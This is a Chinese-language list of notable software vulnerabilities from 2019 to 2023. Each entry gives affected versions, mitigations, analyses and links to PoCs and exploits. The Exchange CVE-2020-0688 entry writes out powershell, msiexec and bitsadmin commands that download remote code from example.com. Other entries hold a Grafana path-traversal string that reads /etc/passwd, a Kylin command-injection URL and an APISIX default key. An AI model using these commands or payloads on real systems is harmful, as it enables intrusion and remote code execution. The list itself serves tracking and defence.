2023
- 【20231129】Apache ActiveMQ RCE漏洞 CVE-2022-41678
- 2023年11月,Apache发布新版本修复漏洞
- 登录后的攻击者,可以利用 /api/jolokia 接口来执行一系列的操作,写入Webshell
- 影响范围:< 5.16.6、< 5.17.4 受影响, 5.18.0 不受影响,6.0.0 不受影响
- jetty 允许 org.jolokia.http.AgentServlet 处理对 /api/jolokia 的请求
- org.jolokia.http.HttpRequestHandler#handlePostRequest 能够通过 JSONObject 创建 JmxRequest。并调用 org.jolokia.http.HttpRequestHandler#executeRequest。可以通过Java 11以上版本上存在的jdk.management.jfr.FlightRecorderMXBeanImpl来实现RCE。1 调用 newRecording. 2 调用setConfiguration。其中隐藏着一个webshell数据,3 调用startRecording、stopRecording,4 调用 copyTo 方法写入 Webshell 到 jsp 文件
- 缓解措施:限制(默认情况下)Jolokia 上授权的操作,或禁用 Jolokia
- 【20231122】iDocView /html/2word 远程代码执行漏洞
- iDocView /html/2word 远程代码执行漏洞
- 本次漏洞出现在在线文档解析应用中的远程页面缓存功能。具体问题在于该应用未能对用户输入的URL进行充分的安全验证,从而导致存在安全隐患。攻击者可通过构造特殊的URL,引诱应用下载恶意文件。
- iDocView < 13.10.1_20231115
- 【20231031】Atlassian Confluence 权限绕过代码执行漏洞 CVE-2023-22518
- 【20231025】Apache ActiveMQ RCE
- 影响范围 < 5.18.3, < 5.17.6, < 5.16.7, < 5.15.16
- 默认端口 61616
- 【20231011】Curl溢出漏洞(实用性一般)
- 【20230911】libwebp (WebP) 堆缓冲区溢出漏洞 CVE-2023-4863 CVE-2023-41064
- PoC:https://github.com/mistymntncop/CVE-2023-4863
- 漏洞分析:https://mp.weixin.qq.com/s/zqxkYk7vRvDPKxgoVj1PRw
- webp图片的处理代码逻辑中。当解析一个无损格式的webp图片时,解码器采用了范式霍夫曼编码 (Canonical Huffman Code) 算法,首先从图片流中读取前缀编码的数据,基于此数据构建一个完整的霍夫曼编码表,随后依照这个编码表对图片流中的压缩数据进行解码,得到原始的图像。
- 解码器以为图片中保存的霍夫曼编码表数据是合理的,因此提前计算了这一情况下能够容纳的最大内存长度。而霍夫曼编码表数据是来自不受信任源的,是可以由攻击者任意构造的,且编码器不会对这些数据进行有效性检查。因此,如果攻击者能够构造出一个非法的霍夫曼表,包含了大量的长编码,这将导致解码器将分配过多的二级表,使得霍夫曼表的总内存大小超过分配大小,发生堆缓冲区溢出。
- 该漏洞发生在一个基础库中,影响范围非常广。
- 【20230726】Citrix ADC&Citrix Gateway RCE漏洞 CVE-2023-3519
- 【20230725】Ivanti Mobileircon RCE
- https://forums.ivanti.com/s/article/CVE-2023-35078-Remote-unauthenticated-API-access-vulnerability?language=en_US
- https://github.com/vchan-in/CVE-2023-35078-Exploit-POC/
- 【20230722】Metabase 前台 RCE CVE-2023-38646
- POC1: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
- POC2: https://mp.weixin.qq.com/s/iV68Vx-AP5_KreCG-aMiJA
- 利用大小写转换绕过INT:https://rce.moe/2023/07/28/Metabase-CVE-2023-38646/
- http://127.0.0.1:3000/api/session/properties
- 测试环境:https://downloads.metabase.com/v0.46.6.1/metabase.jar
- 测试环境:https://downloads.metabase.com/v0.46.6/metabase.jar
- 【20230711】Ghostscript RCE 漏洞CVE-2023-36664
- 【20230707】Linux内核提权 StackRot (CVE-2023-3269)
- 【20230601】Apache RocketMQ 远程命令执行漏洞(CVE-2023-33246)
- RocketMQ Broker组件如果暴露端口且未授权访问,则可能被RCE
- 影响版本:
<RocketMQ 4.9.6
,<RocketMQ 5.1.1
- EXP: https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT
- 复现分析:https://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652897338&idx=1&sn=58492b8499ab8e6e2a6406937a7f9bb4
- 【20230525】Nacos内网集群Raft反序列化漏洞
- https://avd.aliyun.com/high-risk/list
- 影响版本: 1.3.0 <= com.alibaba.nacos:nacos-consistency < 1.4.6 , 2.0.0 <= com.alibaba.nacos:nacos-consistency < 2.2.3
- 【20230415】Windows 消息队列服务 RCE CVE-2023-21554
- 【20230428】Exchange RCE漏洞 CVE-2023-21707
- 【20230420】PostgreSQL权限提升漏洞
- 当攻击者拥有PostgreSQL数据库的普通账号权限后,可以在PostgreSQL数据库上创建一个恶意函数(函数内容为执行恶意命令)用于覆盖劫持正常函数,随后安装插件(安装插件时候会以最高权限执行该恶意函数),造成服务器被入侵控制。
- 修复方案:禁止pg_bigm、postgis插件安装
- https://cloud.tencent.com/document/product/409/90358
- 【20230419】MySQL Server远程拒绝服务漏洞 CVE-2023-21912
- Oracle MySQL Server中存在漏洞,允许未经身份验证的攻击者通过多种协议对MySQL Server进行利用,进而导致MySQL Server崩溃。
- https://nvd.nist.gov/vuln/detail/CVE-2023-21912
-
【20230327】OpenAI存在Web Cache Deception漏洞
- 【20230327】影响ChatGPT,redis-py 信息泄露漏洞(CVE-2023-28858)
- 使用redis-py时,如果在不恰当的时候取消异步Redis命令,会导致连接未关闭,这会产生响应的错位,即后续命令会获取到之前命令的响应。
- https://github.com/redis/redis-py/issues/2624
- https://github.com/redis/redis-py/issues/2665
- 【20230324】ImageMagic文件读取漏洞 CVE-2022-44268
- ImageMagick 图像处理软件7.1.0-49版本存在信息泄露漏洞,成功利用该漏洞可在解析图像时从服务器读取任意文件,可升级到ImageMagick 7.1.0-52版本
- 【20230323】MinIO 信息泄露漏洞(CVE-2023-28432)
- 未经身份认证的远程攻击者通过发送特殊HTTP请求即可获取所有环境变量,其中包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,造成敏感信息泄露,最终可能导致攻击者以管理员身份登录MinIO。
- https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z
- https://mp.weixin.qq.com/s/BPUEAGTbNaQhlXMMLbvpkw
- 【20230310】Apache Dubbo RCE 反序列化漏洞CVE-2023-23638
- https://xz.aliyun.com/t/12396
- Exploit:https://github.com/YYHYlh/Apache-Dubbo-CVE-2023-23638-exp/tree/main
- 分析与利用:https://forum.butian.net/share/2277
- 【20230208】Apache Kafka远程代码执行漏洞 CVE-2023-25194
- 不安全的反序列化,利用条件比较高
- https://mvip.riskivy.com/detail/1623079710978347008?oi=otbzlvsIExhEyHYz1qtihs9407P8&fr=wechat&pmi=18
- 受影响范围 Apache Kafka 2.3.0 ~ 3.3.2
2022
- 【20221111】YAPI命令执行
- TCP/IP 漏洞 CVE-2022-34718 PoC
- 【20221013】Apache Commons Text RCE CVE-2022-42889漏洞
- https://www.4hou.com/posts/QLGq
- 影响 <1.10.0
- 【20220930】Exchange RCE
- https://www.rapid7.com/blog/post/2022/09/29/suspected-post-authentication-zero-day-vulnerabilities-in-microsoft-exchange-server/
- https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html
- https://github.com/testanull/ProxyNotShell-PoC
- 【20220921】CobaltStrike Beacon XSS RCE CVE-2022-39197
- https://mp.weixin.qq.com/s/BJ4GVI_7Adrj6L6yqPR3sQ
- https://mp.weixin.qq.com/s/l5e2p_WtYSCYYhYE0lzRdQ
- 复现细节 https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw
- 临时补丁 https://github.com/burpheart/CVE-2022-39197-patch
- 官方再次发布新版本 4.7.2 修复绕过,https://www.cobaltstrike.com/blog/out-of-band-update-cobalt-strike-4-7-2/
- 漏洞分析:https://securityintelligence.com/posts/analysis-rce-vulnerability-cobalt-strike/
- 【20220827】Chrome 2022年在野利用的漏洞
- 2月 CVE-2022-0609
- 3月 CVE-2022-1096
- 4月 CVE-2022-1364
- 5月 CVE-2022-2294
- 8月 CVE-2022-2856
- https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247549180&idx=2&sn=4433324f9099181c91b8b8a2101a3ae9
- 【20220706】OpenSSL 远程代码执行漏洞(影响有限)
- https://www.openssl.org/news/secadv/20220705.txt
- 此漏洞仅影响 OpenSSL 3.0.4 版本,并且只有支持 AVX512IFMA 扩展指令的系统才会受影响。OpenSSL 1.1.1/1.0.2系列版本不受此漏洞影响,这意味着常规Linux发行版例如 CentOS、Debain、Ubuntu 在安装系统原生软件包时不会受到影响。此漏洞影响范围有限,用户不必惊慌。
- PoC: https://gist.github.com/guidovranken/4b468777d9f108a26a5a45ce62b88b17
- 【20220705】Django SQL注入
- 漏洞环境和POC:https://github.com/aeyesec/CVE-2022-34265
- 影响 Django 3.2.x prior to 3.2.14
- 影响 Django 4.0.x prior to 4.0.6
- 【20220622】Microsoft Windows DFSCoerce 域控提权漏洞
- 【20220610】PHP M有SQL、Postgre 函数存在RCE漏洞 CVE-2022-31626、CVE-2022-31625
- 官方Issue(含测试脚本):https://bugs.php.net/bug.php?id=81719
- 官方Issue(含测试脚本):https://bugs.php.net/bug.php?id=81720
- 漏洞分析:https://mp.weixin.qq.com/s/JjLtu3JMYGWT0WGOpEDpkg
- 漏洞分析:https://mp.weixin.qq.com/s/2jleLB3fdisJShbTBGLFfw
- 安全版本:PHP 8.1.7 或 PHP 8.0.20 或 PHP 7.4.30
- 影响版本:8.1.0 <= PHP < 8.1.7、8.0.0 <= PHP < 8.0.20、7.0.1 <= PHP < 7.4.30
- 【20220603】Confluence OGNL 命令注入漏洞CVE-2022-26134
- https://cert.360.cn/warning/detail?id=b5ed926c419f0eeccc3c801c31e9d1a0
- POC https://github.com/Nwqda/CVE-2022-26134/blob/master/cve-2022-26134.py
- POC https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134
- https://y4er.com/post/cve-2022-26134-confluence-server-data-center-ognl-rce/
- 【20220531】Microsoft Office命令执行 Follina
- https://mp.weixin.qq.com/s/GFHih6KY_MCbzR5x2ftHkA
- 使用 Word 远程模板功能从远程 Web 服务器检索 HTML 文件,该服务器又使用 ms-msdt MSProtocol URI 方案加载代码并执行一些 PowerShell。即使禁用宏,Microsoft Word 也会通过 msdt执行代码。如果您将文档更改为 RTF 形式,它甚至无需打开文档(通过资源管理器中的预览选项卡)即可运行。
- PoC: https://github.com/chvancooten/follina.py
- PoC: https://github.com/JMousqueton/PoC-CVE-2022-30190/blob/main/cve-2022-30190.py
- 漏洞公告:https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190
- 【20220523】FastJson <=1.2.80反序列化漏洞,绕过autotype
- 【20220429】微软Azure Postgre 存在 “ExtraReplica” 漏洞
- https://www.wiz.io/blog/wiz-research-discovers-extrareplica-cross-account-database-vulnerability-in-azure-postgresql
- Postgresql可提权并获取命令执行权限,控制实例所在主机。主机上不同租户PG实例未隔离。Postgresql客户端证书身份验证的“pgusermap”字段配置正则存在缺陷,可绕过证书CommonName校验,从而登录任意用户的PostgreSQL实例。
- 【20220330】Spring Core RCE 0day漏洞 CVE-2022-22965
- 【20220325】Spring Cloud Function Spel 表达式注入
- http://blog.nsfocus.net/spring-cloud-function-spel/
- https://mp.weixin.qq.com/s/onYJWIESgLaWS64lCgsKdw
- 影响版本:0.0.RELEASE <= Spring Cloud Function <= 3.2.2 (发布时间为2019年11月22日至2022年2月17日)
- https://mp.weixin.qq.com/s/Q-Koj0MojkHwFtHzVtNPKQ
- https://www.anquanke.com/post/id/271167
- 【20220317】OpenSSL证书解析拒绝服务漏洞 CVE-2022-0778
- 影响版本:OpenSSL版本1.0.2:1.0.2-1.0.2zc、OpenSSL版本1.1.1:1.1.1-1.1.1m、OpenSSL版本3.0:3.0.0、3.0.1
- 【20220317】供应链攻击 node-ipc
- 一共有两个问题,1. ssl-geospec.js 恶意文件,会覆盖文件。 2. peacenotwar 依赖,会创建反战文件。
- 影响版本:ssl-geospec.js(影响10.1.1、10.1.2),peacenotwar(影响 9.2.2、11.0.0、11.1.0)
- 事件分析:https://mp.weixin.qq.com/s/6gbuBytsehzaMYwx-PxJ9w
- 2022-03-07 10.1.1 引入了 ssl-geospec.js,2022-03-08 10.1.3 中删除了 ssl-geospec.js https://github.com/RIAEvangelist/node-ipc/commit/cc282c2b06c98eb0a01543639ac8d117476dc4c8
- ssl-geospec.js代码:https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js
-
ssl-geospec.js的功能是如果安装用户的ip是俄罗斯或者白俄罗斯的,则遍历./,../,../../,/ 等四个目录下的文件,并在文件中覆盖写入 ❤ 其中查询ip位置的url: https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154已经无效,ssl-geospec.js功能不起作用。
- 作者在 node-ipc 代码中加入了 peacenotwar 依赖,影响 9.2.2、11.0.0、11.1.0 版本。vue-cli 会 用到 node-ipc,受到影响。
- peacenotwar代码:https://github.com/RIAEvangelist/peacenotwar
- peacenotwar 包的功能会在 Desktops、OneDrive、OneDriveDesktops 创建 WITH-LOVE-FROM-AMERICA.txt 文件。
- 有开发者提供了该问题的解决方式:首先按照 readme 正常 install,构建结束后,用编辑器全局搜索’peacenotwar’,将其全部删除;然后在项目的 node_models 目录下,将’peacenotwar’目录删除;之后将’项目 /node_modules/node-ipc/node-ipc.js’这个文件中引用’peacenotwar’的代码注释掉,便可以正常启动项目。
- 【20220308】Linux Dirty Pipe提权漏洞 CVE-2022-0847
- 漏洞详情:https://dirtypipe.cm4all.com/
- https://www.bleepingcomputer.com/news/security/new-linux-bug-gives-root-on-all-major-distros-exploit-released/
- 影响版本:Linux Kernel 版本 >= 5.8、Linux Kernel 版本 < 5.16.11 / 5.15.25 /5.10.102
- 【20220302】Spring Cloud Gateway Server 存在表达式注入漏洞 CVE-2022-22947
- 分析 https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
- PoC https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947-/blob/main/spring_cloud_RCE.py
- gateway/routes、actuator/gateway/routes
-
【20220216】钉钉客户端RCE漏洞
-
【20220215】向日葵RCE漏洞
- 【20220206】Linux容器逃逸漏洞 CVE-2022-0492
- https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492/blob/main/can-ctr-escape-cve-2022-0492.sh
- https://github.com/puckiestyle/CVE-2022-0492/tree/main
- https://github.com/chenaotian/CVE-2022-0492
- 漏洞分析:https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/
- 【20220125】APISIX batch-requests插件默认Key命令执行漏洞
- Key: edd1c9f034335f136f87ad84b625c8f1
- https://blog.ssrf.kr/71#:~:text=Is%2Dth3%2Dquesti0n%7D-,api6,-apache%20apisix%20%EC%B5%9C%EC%8B%A0%EB%B2%84%EC%A0%84%EC%9D%84
- 出自 Real World CTF 题目 API6: https://github.com/perfectblue/ctf-writeups/blob/master/2022/realworld-ctf-2022/API6/solve.py
- 【20220125】Linux pwnkit提权漏洞CVE-2021-4034【好用】
- https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
- Polkit pkexec权限提升漏洞https://mp.weixin.qq.com/s?__biz=MzUxMDQzNTMyNg==&mid=2247498693&idx=2&sn=a09f300fd93917c2191cba0a0019cc1f&chksm=f901b154ce76384279cc74095a5d49e9ca2607ba8aa542621cc2a7b0de991238b2c19a1484cb#rd
- 从 2009 年开始的所有 Polkit 版本都存在漏洞
- 使用Linux 发行版系统相应的包管理器更新 polkit 程序包,如 apt upgrade policykit-1 或者 yum clean all && yum -y update polkit
- PoC代码:https://github.com/arthepsy/CVE-2021-4034
- 【20220119】Linux内核提权、容器逃逸 CVE-2022-0185
- https://blog.nsfocus.net/linux-cve-2022-0185/
- 影响范围:5.1-rc1 ~ 5.16.2(修复)
- 【20220111】Alibaba Dubbo Hession-lite反序列化漏洞 CVE-2021-43297
2021
- 【20211209】Log4j JNDI注入代码执行漏洞
- 【20211213】Grafana文件读取漏洞
- /public/plugins/graph/../../../../../../../../../../../../../../../etc/passwd
- 【20211117】Gitlab RCE漏洞CVE-2021-22205
- GitLab没有正确验证传递到文件解析器的image文件而导致的远程命令执行,远程攻击者可以利用此漏洞访问存储库,并删除、修改或窃取源代码。
- PoC: https://packetstormsecurity.com/files/164994/gitlab13102reverse-exec.txt
- https://mp.weixin.qq.com/s?__biz=MzUxMDQzNTMyNg==&mid=2247497310&idx=2&sn=361d0f36b3d5891aa600b44bb5fa16ee&chksm=f901bccfce7635d9d4ad0ad51e3ed08eae439dbb467b391bb21439c38c7cf224d3cf9cbc725d#rd
- 【20211115】Hadoop Yarn RPC未鉴权
- 【20210905】GhostScript 9.50 RCE
- 【20210720】Linux内核提权漏洞 Sequoia CVE-2021-33909
- Linux 内核的seq_file 接口存在size_t-to-int 类型转换漏洞,由于fs/seq_file.c 没有正确限制 seq 缓冲区分配,从而导致整数溢出、越界写入以及权限提升。可导致提权,特权容器的逃逸。
- 分析:https://www.qualys.com/2021/07/20/cve-2021-33909/sequoia-local-privilege-escalation-linux.txt
- 分析: http://blog.nsfocus.net/linux-2021-33909/
- Crash PoC: https://www.qualys.com/2021/07/20/cve-2021-33909/cve-2021-33909-crasher.c
- 影响内核 3.16 ~ 5.13.4,5.13.4及以上版本不受影响
- 【20210715】Linux内核提权漏洞 CVE-2021-22555
- 补丁:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/x_tables.c?id=b29c457a6511435960115c0f548c4360d5f4801d
- 成功利用此漏洞可以完成特权提升及实现docker、kubernetes环境逃逸
- 影响Linux Kernel版本 >=2.6.19
- 安全版本 Linux Kernel版本 5.12(b29c457a6511435960115c0f548c4360d5f4801d),5.10.31, 5.4.113, 4.19.188, 4.14.231, 4.9.267, 4.4.267
- 临时缓解方案:echo 0 > /proc/sys/user/max_user_namespaces
- PoC:https://github.com/google/security-research/blob/master/pocs/linux/cve-2021-22555/exploit.c
- 【20210630】域控漏洞PrintNightmare CVE-2021-1675
- CVE-2021-1675 打印机漏洞沦陷域控的补充 07/02/21 https://mp.weixin.qq.com/s/tMTIsijirsPc46CZVtcWQg
- CVE-2021-1675 打印机漏洞沦陷域控的检测与防御https://mp.weixin.qq.com/s/k4OwCcJJxm-UHMdVdfBCIw
- exploit: https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210701
- 【20210326】OpenSSL拒绝服务漏洞 CVE-2021-3449
- 分析:https://mp.weixin.qq.com/s/h1EGkxMcHvpk4V3iIFmAXA
- PoC: https://github.com/terorie/cve-2021-3449
- 影响所有OpenSSL 1.1.1版本
- 【20210315】XStream多个命令执行高危漏洞
- https://cert.360.cn/warning/detail?id=8c087e83dc7e64c8aa47fb9b964ee310
- 命令执行:CVE-2021-21344、CVE-2021-21345、CVE-2021-21346、CVE-2021-21347、CVE-2021-21350、CVE-2021-21351
- 官方公告(含PoC):https://x-stream.github.io/CVE-2021-21344.html
- 【20210311】F5 BIG-IP命令执行漏洞CVE-2021-22986
- 【20210303】Exchange RCE CVE-2021-26855 CVE-2021-27065 ProxyLogon
- CVE-2021-26855 是一个SSRF 漏洞可以获取用户的sid,CVE-2021-27065是一个写文件漏洞,文件名与路径可以任意设置。
- https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
- https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
- Exchange 攻击链 CVE-2021-26855&CVE-2021-27065 分析 https://webcache.googleusercontent.com/search?q=cache:ITolLchEeE0J:https://paper.seebug.org/1501/+&cd=1&hl=zh-CN&ct=clnk
- Exploit: https://github.com/Immersive-Labs-Sec/ProxyLogon
- 【20210129】Apache Druid RCE漏洞CVE-2021-25646
- Apache Druid 是用Java编写的面向列的开源分布式数据存储,由于Apache Druid 默认情况下缺乏授权认证,攻击者可直接构造恶意请求执行任意代码,控制服务器。
- https://help.aliyun.com/noticelist/articleid/1060799717.html
- PoC https://github.com/kxcode/snippet/blob/master/CVE-2021-25646.txt
- 【20210127】Sudo溢出提权漏洞CVE-2021-3156
- 【20210126】SonicWall SSL-VPN 远程命令执行
- 特定的User-Agent可导致某CGI触发逻辑问题,引起Shellshock命令执行漏洞
- https://cert.360.cn/warning/detail?id=4dd54b6c9463194279a407590e0ec925
- 针对 http header 进行检测,可能存在的特征字符串如下
() { :; };
- 修复:升级到 Sonic SMA 8.0.0.4
- Exploit: https://github.com/darrenmartyn/VisualDoor
2020
- 【20201116】XStream反序列化漏洞CVE-2020-26217
- 【20201029】Weblogic Console代码执行漏洞CVE-2020-14882
- 【20201027】xxl-job 执行器未授权 RCE
- 【20200811】Windows域控提权CVE-2020-1472 ZeroLogon
- 【20200808】vBulletin 5.x 远程代码执行漏洞
- 【20200731】GRUB2缓冲区溢出漏洞CVE-2020-10713
- 【20200716】Apache Kylin命令注入漏洞CVE-2020-13925
- https://www.anquanke.com/post/id/210867
- PoC:
http://example.com/kylin/api/diag/project/此处命令注入/download
- 影响版本:3.1.0以下版本
- 修复分析:dumpProjectDiagnosisInfo() 中增加了 CliCommandExecutor.checkParameter(project) 进行参数检查
- 历史相关漏洞:CVE-2020-1956 https://paper.seebug.org/1237/
- 【20200715】Windows DNS Server命令执行漏洞CVE-2020-1350
- 【20200703】F5 BIG-IP的流量管理用户页面TMUI存在Java代码执行漏洞 CVE-2020-5902
- 【20200623】Apache Dubbo反序列化漏洞CVE-2020-1948
- 【20200602】FastJson反序列化漏洞,绕过Autotype
- 影响1.2.69以下版本
- 通过expectClass绕过Autotype限制
- 需要目标服务器上存在可利用的Gadget,才能进行命令执行
- https://paper.seebug.org/1236/
- 【20200525】Nexus Repository Manager 后台 RCE (CVE-2020-10199)
- 受影响版本:Nexus Repository Manager OSS/Pro 3.x <= 3.21.1
- 在Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当,导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码、执行了不安全的EL表达式,从而获取到系统权限。
- https://github.com/fofapro/vulfocus
docker pull vulfocus/nexus-cve_2020_10199
- https://github.com/vulhub/vulhub/blob/master/nexus/CVE-2020-10199/README.md
- 【20200501】SaltStack认证绕过远程命令执行
- 【20200401】Liferay 反序列化漏洞 CVE-2020-7961
- https://www.anquanke.com/post/id/203870
- 浅谈Liferay Portal JSON Web Service未授权反序列化远程代码执行漏洞 https://xz.aliyun.com/t/7485
- 【20200312】微软SMBv3蠕虫级远程命令执行漏洞CVE-2020-0976
- 【20200226】Exchange服务器命令执行漏洞RCE CVE-2020-0688
- 官方公告:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688
- 漏洞分析:https://nosec.org/home/detail/4158.html
- PoC: https://github.com/Jumbo-WJB/CVE-2020-0688/blob/master/CVE-2020-0688.py
- 注意:CU12也受影响
- 描述:Exchange安装时使用了静态密钥,在获取一个普通用户的登陆session之后,攻击者可以利用Exchange的静态密钥构造ViewState,从而发送恶意序列化Payload来执行命令。注意,CU12版本也受影响。攻击的目标CGI为:/ecp/default.aspx
- 其他:一般Exchange服务器部署在内网,可以通过ping、nslookup等命令利用dnslog探测。如果有外网的话,可以使用powershell、msiexec、bitsadmin、telnet等命令进行外连探测,不过bitsadmin、powershell、msiexec等容易被拦截或检测。
- powershell.exe -nop -c “IEX ((new-object net.webclient).downloadstring(‘http://example.com/test’))”
- msiexec /q /i http://example.com/test
- bitsadmin /transfer n http://example.com/test C:\test
- 【20200220】Tomcat AJP文件包含漏洞CVE-2020-1938
- 漏洞分析:https://mp.weixin.qq.com/s/GzqLkwlIQi_i3AVIXn59FQ
- PoC:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py
- PoC:https://github.com/threedr3am/learnjavabug/commit/6336bad2a7fb618cb5b982de77086b871dbed715
- 影响版本:Apache Tomcat 9.x < 9.0.31
- Apache Tomcat 8.x < 8.5.51
- Apache Tomcat 7.x < 7.0.100
- Apache Tomcat 6.x
- 【202002】Dubbo HTTP反序列化漏洞CVE-2019-17564
- Dubbo是一个RPC框架,支持多种交互协议。漏洞没什么好说的,一个反序列化输入点,有Gadget就能打。
- Dubbo HTTP借助了 Spring 提供的 HttpInvoker 封装了 refer 和 exporter 的逻辑。HttpInvoker中直接readObject()没什么防护。访问Dubbo HTTP的RPC接口地址,直接Post反序列化payload搞定。
- 【20200115】Weblogic命令执行漏洞CVE-2020-2546、CVE-2020-2551
- 漏洞信息:https://mp.weixin.qq.com/s/Q-ZtX-7vt0JnjNbBmyuG0w
- CVE-2020-2546,通过T3协议实现利用、攻击者可通过此漏洞实现远程代码执行
- CVE-2020-2551,攻击者可以通过IIOP协议远程访问Weblogic Server服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码(该漏洞可以绕过Oracle官方在2019年10月份发布的最新安全补丁)。
- PoC:暂无
- 【20200115】Windows核心加密库严重漏洞可绕过证书签名CVE-2020-0601
- 漏洞信息:https://mp.weixin.qq.com/s/8ipXMA2XjFN-kuSm0gkIaw
- 漏洞分析:https://cert.360.cn/report/detail?id=082c39952ca78152857c31e35e9af6d5
- https://securityaffairs.co/wordpress/96486/uncategorized/cve-2020-0601-nsacrypto-exploits.html
- https://blog.rapid7.com/2020/01/16/cve-2020-0601-windows-cryptoapi-spoofing-vulnerability-what-you-need-to-know/
- NSA报告:https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF
- PoC:https://github.com/kudelskisecurity/chainoffools
- PoC:https://github.com/ollypwn/cve-2020-0601
2019
- 【20191220】Apache Log4j 1.2 SocketServer 反序列化漏洞CVE-2019-17571
- 漏洞信息:https://seclists.org/oss-sec/2019/q4/167
- 影响范围:Apache Log4j 1.2.27及以下版本都受影响,在Log4j 2.8.2中修复了这个漏洞(CVE-2017-5645)。
- 漏洞分析:https://mp.weixin.qq.com/s/VgYiuFl9PsiKJt0_t0ae7w
- 漏洞描述:在2.8.2之前的2.x版本都存在反序列化漏洞(CVE-2017-5645),然而在1.x版本同样存在这个反序列化漏洞,分配漏洞编号为CVE-2019-17571。
- 【20191130】MySQL JDBC Deserialization 反序列化RCE
- 【20191119】Apache Solr默认配置对外开放JMX端口导致命令执行CVE-2019-12409
- https://www.mail-archive.com/[email protected]/msg05559.html
- 8.1.1和8.2.0版本中默认配置文件solr.in.sh中
ENABLE_REMOTE_JMX_OPTS
默认设置为true,会开放JMX服务,将RMI端口暴露,从而导致命令执行。默认端口为18983。 - 利用工具:mjet
- 【20191112】Flink未鉴权RCE
- 未鉴权的Flink Dashboard可以提交任务,可以提交恶意的jar包来执行命令。
- PoC:https://github.com/LandGrey/flink-unauth-rce
- 【20191107】Squid缓冲区溢出远程代码执行CVE-2019-12526
- Squid发布了新版本4.9,新版本修复了远程溢出漏洞CVE-2019-12526 http://www.squid-cache.org/Advisories/SQUID-2019_7.txt
- 早在 2019-07-12 Squid官方发布安全公告CVE-2019-12527,http://www.squid-cache.org/Advisories/SQUID-2019_5.txt
- CVE-2019-12527漏洞分析及PoC片段:https://mp.weixin.qq.com/s/7oSuurI_h04GacLVOckaxQ
- 2019-08-22 趋势科技发布CVE-2019-12527研究报告: https://www.thezdi.com/blog/2019/8/22/cve-2019-12527-code-execution-on-squid-proxy-through-a-heap-buffer-overflow
- 【20191031】Apache Solr Velocity模版注入RCE漏洞
- 【20191023】Apache Shiro Padding Oracle漏洞 CVE-2019-12422
- 在获取一个有效的rememberme的情况下,通过PaddingOracle构造恶意的rememberme实现反序列化利用。
- 分析: https://www.anquanke.com/post/id/192819
- Issue: https://issues.apache.org/jira/browse/SHIRO-721
- 描述:1. 需要合法的Cookie然而很多业务Cookie里没有rememberMe 2. Padding Oracle依赖页面返回信息来进行侧信道攻击 3. 需要目标环境存在反序列化Gadget
- 关于PaddingOracle:http://blog.zhaojie.me/2010/10/padding-oracle-attack-in-detail.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12422
- PoC: https://github.com/Geekby/shiro_rce_exp
- 【20191023】PHP远程命令执行漏洞CVE-2019-11043
- 【20191017】Kibana < 6.6.0 控制台命令执行漏洞
- https://mp.weixin.qq.com/s/R4rzYDp9-q2NYAOvPK951A
- PoC需要Timelion、Canvas两个功能 https://github.com/jas502n/kibana-RCE
- 没有Canvas情况下的利用,可能会把目标打挂 https://www.synacktiv.com/en/publications/pwning-an-outdated-kibana-with-not-so-sad-vulnerabilities.html
- 【20191010】iTerm2存在严重漏洞可导致远程命令执行
- 【20190905】FastJson拒绝服务漏洞 影响版本<1.2.60
- FastJson在处理\x转义字符时没有进行格式判断,攻击者可以向服务器发送恶意请求,导致CPU/RAM过载。
- PoC:
{"a":"\x"}
- 【20190814】MSCTF提权漏洞,影响XP到Win10所有版本
- https://thehackernews.com/2019/08/ctfmon-windows-vulnerabilities.html
- https://googleprojectzero.blogspot.com/2019/08/down-rabbit-hole.html
- https://github.com/taviso/ctftool
- https://bugs.chromium.org/p/project-zero/issues/detail?id=1859
- 【20190814】Windows RDP蠕虫漏洞CVE-2019-1181、CVE-2019-1182
- 【20190801】Apache Slor RCE CVE-2019-0193
- 在Apache Solr中,DataImportHandler是一个可选但常用的模块,由于DIH配置可以包含脚本,因此dataConfig参数存在安全风险。而从Solr的8.2.0版开始,使用此参数需要将Java System属性enable.dih.dataConfigParam设置为true,并不能直接触发。
- https://issues.apache.org/jira/browse/SOLR-13669
- https://www.jianshu.com/p/11ac6c7f4835
- https://www.anquanke.com/post/id/184151
- 【20190730】iMessage远程获取文件CVE-2019-8646
- 【2019-07-22】ProFTPd任意文件拷贝漏洞CVE-2019-12815
- 需要登录或者匿名账号
